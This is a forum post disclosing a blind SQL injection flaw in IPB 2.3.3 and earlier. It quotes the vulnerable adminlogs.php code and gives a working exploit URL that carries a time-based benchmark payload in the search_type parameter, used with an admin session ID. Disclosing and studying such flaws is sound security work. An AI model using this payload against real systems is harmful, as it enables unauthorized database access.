Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
IPB <= 2.3.3 blind sql-injection
Posted by: perdimonokl
Date: December 02, 2007 10:08AM

-------------
adminlogs.php
-------------

BUG FOUND: perdimonokl aka 4nob1oz
BUG FOUND DATE: 24/11/2007

/*
* VULN FUNCTION
* ----------------
*
* function view()
*
* ----------------
* VULN CODE
*
* --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* else
* {
* $this->ipsclass->input['search_string'] = urldecode($this->ipsclass->input['search_string']);
*
* $dbq = "m.".$this->ipsclass->input['search_type']." LIKE '%".$this->ipsclass->input['search_string']."%'";
*
* $row = $this->ipsclass->DB->build_and_exec_query( array( 'select' => 'COUNT(m.id) as count', 'from' => 'admin_logs m', 'where' => $dbq ) );
*
* $row_count = $row['count'];
*
* $query = "&act=adminlog&code=view&search_type={$this->ipsclass->input['search_type']}&search_string=".urlencode($this->ipsclass->input['search_string']);
*
* $this->ipsclass->DB->cache_add_query( 'adminlogs_view_two', array( 'dbq' => $dbq, 'limit_a' => $start ) );
* $this->ipsclass->DB->cache_exec_query();
* }
*
* --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
*
*/

EXPLOIT
-------

adsess=85f93b41dd3244e5680f5085b28b56bf ---> When you login to admin panel you open admin session and you can see it in variable "adsess="

Replace the "adsess=" in url with your own

http://localhost/forum/admin/index.php?adsess=85f93b41dd3244e5680f5085b28b56bf&section=admin&act=adminlog&code=view&act=adminlog&section=admin&search_string=333&search_type=act+and+1=if(substring(version(),1,1)=5,1,benchmark(999999,md5(now())))--

Just for you bugtrack :) I found it 2 or 3 weeks ago

Options: ReplyQuote


Sorry, only registered users may post in this forum.